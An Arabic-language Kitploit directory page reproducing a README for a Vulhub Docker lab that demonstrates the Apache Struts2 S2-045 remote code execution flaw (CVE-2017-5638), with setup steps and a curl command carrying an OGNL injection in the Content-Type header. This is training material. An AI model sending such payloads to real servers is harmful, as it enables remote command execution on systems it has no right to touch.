Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
vulhub-struts2 — مختبر عملي يوضح استغلال ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) في Apache Struts2 (CVE-2017-5638) باستخدام بيئات Vulhub Docker. يتضمن تعليمات الإعداد والأوامر اللازمة لتشغيل الحاوية المعرضة للخطر. | Kitploit
أدوات/GitHubGitHub/soufiane-benchahyd/vulhub-struts2
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubsoufiane-benchahyd/vulhub-struts2

vulhub-struts2

مختبر عملي يوضح استغلال ثغرة حرجة في تنفيذ التعليمات البرمجية عن بُعد (RCE) في Apache Struts2 (CVE-2017-5638) باستخدام بيئات Vulhub Docker. يتضمن تعليمات الإعداد والأوامر اللازمة لتشغيل الحاوية المعرضة للخطر.

عرض المستودع
2منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Apache Struts2 S2-045 RCE (CVE-2017-5638)

📌 نظرة عامة

يوضح هذا المشروع ثغرة تنفيذ الأوامر عن بُعد (RCE) في Apache Struts2 (CVE-2017-5638).

يمكن للمهاجمين استغلال ترويسة HTTP Content-Type مصمّمة بعناية لتنفيذ أوامر نظام عشوائية على الخوادم المعرّضة للثغرة.

يستخدم هذا المستودع مختبرات Vulhub على Docker لتوفير بيئة آمنة لاختبار الثغرة وفهمها.


🛠 إعداد البيئة

  • المضيف: Ubuntu 24.04 (VirtualBox أو النظام الأصلي)
  • Docker و Docker Compose
  • مختبر Vulhub
  • إصدار Apache Struts2: 2.3.30

🚀 البدء

1️⃣ استنساخ هذا المستودع

root@kitploit:~
git clone https://github.com/soufiane-benchahyd/vulhub-struts2.git
cd vulhub-struts2/struts2/s2-045

2️⃣ تشغيل الحاوية المعرّضة للثغرة

root@kitploit:~
docker compose up -d

3️⃣ التحقق من أن الحاوية تعمل

root@kitploit:~
docker ps

يجب أن ترى شيئًا مثل:

root@kitploit:~
CONTAINER ID   IMAGE                   COMMAND                  STATUS      PORTS
xxxxxxx        vulhub/struts2:2.3.30   "/usr/local/bin/mvn-…"   Up          0.0.0.0:8080->8080/tcp

4️⃣ اختبار واجهة الويب

افتح متصفحك → http://<VM_IP>:8080 يجب أن تشاهد الصفحة الرئيسية لتطبيق Struts2.

مثال لعنوان IP الخاص بالجهاز الافتراضي: 192.168.56.101


💻 الاستغلال

⚠️ نفّذ الاستغلال فقط في بيئة مختبرية خاضعة للتحكم. لا تهاجم الخوادم العامة أبدًا.

يمكنك الآن اختبار RCE باستخدام سكربتات أو أدوات مثل curl أو Metasploit ضد الحاوية المعرّضة للثغرة.

مثال (استبدل <command> بأمر الاختبار الخاص بك):

root@kitploit:~
curl -v -H "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test','test')}" http://<VM_IP>:8080/

📝 ملاحظات

  • هذا المختبر آمن: جميع العمليات تحدث داخل Docker.
  • يمكن إضافة لقطات شاشة لاختبارك لاحقًا إلى GitHub.
  • يمكنك توسيع هذا المستودع بـثغرات Struts2 أخرى للحصول على ملف تعليمي متكامل.

⚡ المراجع

  • Apache Struts2 S2-045 CVE
  • Vulhub GitHub
تنزيل الأداة